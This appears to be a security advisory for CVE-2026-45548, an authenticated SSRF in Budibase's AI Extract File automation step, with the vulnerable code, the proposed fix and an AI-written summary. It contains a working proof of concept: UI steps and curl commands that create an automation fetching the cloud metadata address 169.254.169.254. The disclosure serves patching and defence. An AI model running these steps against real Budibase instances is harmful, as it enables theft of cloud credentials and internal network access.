VYPR
← All advisories
High severity7.7NVD Advisory· Published May 15, 2026

Budibase: SSRF in AI Extract File Automation Step via Missing IP Blacklist Validation

CVE-2026-45548

Description

Vulnerability

Details

CWE-918: Server-Side Request Forgery (SSRF)

The processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation that is consistently applied to all other automation steps. This allows an authenticated user to trigger server-side requests to internal network addresses.

Vulnerable

Code

**packages/server/src/automations/steps/ai/extract.ts (lines 116, 139)**:

async function processUrlFile(fileUrl: string, ...): Promise {
  const response = await fetch(fileUrl)  // NO blacklist check!
  // ...
  const fallbackResponse = await fetch(fileUrl)  // Also NO blacklist check!
}

Contrast with

All Other Automation Steps (Same Codebase)

Every other automation step that makes outbound HTTP requests properly uses fetchWithBlacklist:

  • steps/slack.ts:19: response = await fetchWithBlacklist(url, {...})
  • steps/discord.ts:28: response = await fetchWithBlacklist(url, {...})
  • steps/zapier.ts:33: response = await fetchWithBlacklist(url, {...})
  • steps/n8n.ts:53: response = await fetchWithBlacklist(url, request)
  • steps/outgoingWebhook.ts: response = await fetchWithBlacklist(url, {...})
  • steps/make.ts: response = await fetchWithBlacklist(url, {...})

The fetchWithBlacklist function (steps/utils.ts:100) validates URLs against the IP blacklist which blocks: - 127.0.0.0/8 (loopback) - 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 (RFC1918 private) - 169.254.0.0/16 (link-local / cloud metadata) - IPv6 private addresses

The AI Extract File step bypasses all of these protections.

Steps to

Reproduce

Via

Budibase UI

  1. Login as builder user
  2. Create or open any app
  3. Go to Automations > New Automation
  4. Add trigger: App Action
  5. Add step: AI > Extract File Data
  6. Set Source: URL
  7. Set File URL: http://169.254.169.254/latest/meta-data/ (or any internal IP)
  8. Click Run Test — the server makes the request without IP blacklist validation

Via curl (API)

# 1. Login and get session cookie
curl -s -c /tmp/bb.txt \
  "http://BUDIBASE_HOST/api/global/auth/default/login" \
  -X POST -H "Content-Type: application/json" \
  -d '{"username":"YOUR_EMAIL","password":"YOUR_PASSWORD"}'

# 2. Create automation with SSRF payload (replace YOUR_APP_ID)
curl -s -b /tmp/bb.txt \
  "http://BUDIBASE_HOST/api/automations" \
  -X POST -H "Content-Type: application/json" \
  -H "x-budibase-app-id: YOUR_APP_ID" \
  -d '{"name":"SSRF PoC","definition":{"trigger":{"stepId":"APP","event":"row:save"},"steps":[{"stepId":"AI_EXTRACT","inputs":{"source":"URL","fileUrl":"http://169.254.169.254/latest/meta-data/"}}]}}'

Code

Review Verification

Compare the vulnerable function with the safe pattern used everywhere else:

VULNERABLE (no blacklist):
  packages/server/src/automations/steps/ai/extract.ts:116
    const response = await fetch(fileUrl)

SAFE (with blacklist) - every other step:
  packages/server/src/automations/steps/slack.ts:19
    response = await fetchWithBlacklist(url, {...})
  packages/server/src/automations/steps/discord.ts:28
    response = await fetchWithBlacklist(url, {...})

Expected vs

Actual Behavior

Expected: processUrlFile() should reject internal/private IPs via fetchWithBlacklist() Actual: fetch(fileUrl) is called directly, allowing requests to 127.0.0.1, 10.x.x.x, 169.254.169.254 etc.

Impact

An authenticated user with builder permissions can:

  • Access cloud metadata endpoints (AWS IAM credentials, GCP service tokens, Azure IMDS)
  • Scan internal network services and ports
  • Access internal APIs not intended for external access
  • Exfiltrate data from internal services via the automation response

In Budibase Cloud (SaaS), this could be used to steal cloud provider credentials, potentially leading to full infrastructure compromise.

Proposed

Fix

Replace fetch(fileUrl) with fetchWithBlacklist(fileUrl), consistent with all other automation steps:

import { fetchWithBlacklist } from "../utils"

async function processUrlFile(fileUrl: string, ...): Promise {
  const response = await fetchWithBlacklist(fileUrl)  // Use blacklist
  // ...
  const fallbackResponse = await fetchWithBlacklist(fileUrl)  // Use blacklist
}

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated SSRF in Budibase AI Extract File step due to missing IP blacklist, allowing internal network requests.

Vulnerability

The processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation (fetchWithBlacklist) that all other automation steps employ [1][2]. This CWE-918 SSRF vulnerability affects all versions prior to fix in 3.38.4 [4]. An authenticated user with builder role can trigger server-side requests to internal network addresses, including loopback, RFC1918 private ranges, and link-local addresses such as cloud metadata endpoints [2][3].

Exploitation

An attacker must be an authenticated user with builder access to create or modify automations [2][3]. Via the UI, they navigate to Automations, add an AI Extract File Data step, set Source to URL, and provide an internal IP (e.g., http://169.254.169.254/latest/meta-data/). Running the test initiates a server-side request without any IP blacklist validation [2][3]. Alternatively, the same can be done via the API using a session cookie.

Impact

Successful exploitation allows the attacker to make the Budibase server send HTTP requests to arbitrary internal hosts, potentially accessing cloud metadata services (e.g., AWS, GCP), internal services, or other resources not meant to be accessible from the outside [2][3]. This can lead to disclosure of sensitive information such as cloud provider credentials, internal service credentials, or configuration data.

Mitigation

The vulnerability is fixed in Budibase version 3.38.4, released on 2026-05-15 [4]. Users should upgrade immediately. No workaround is available other than restricting builder role assignments to trusted users. The CVE is not listed in CISA KEV as of publication.

References
  1. GitHub - Budibase/budibase: AI agents, automations and apps that run your operations. Model agnostic.
  2. CVE-2026-45548 - GitHub Advisory Database
  3. SSRF in AI Extract File Automation Step via Missing IP Blacklist Validation
  4. Release 3.38.4 · Budibase/budibase

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

3

News mentions

0

No linked articles in our index yet.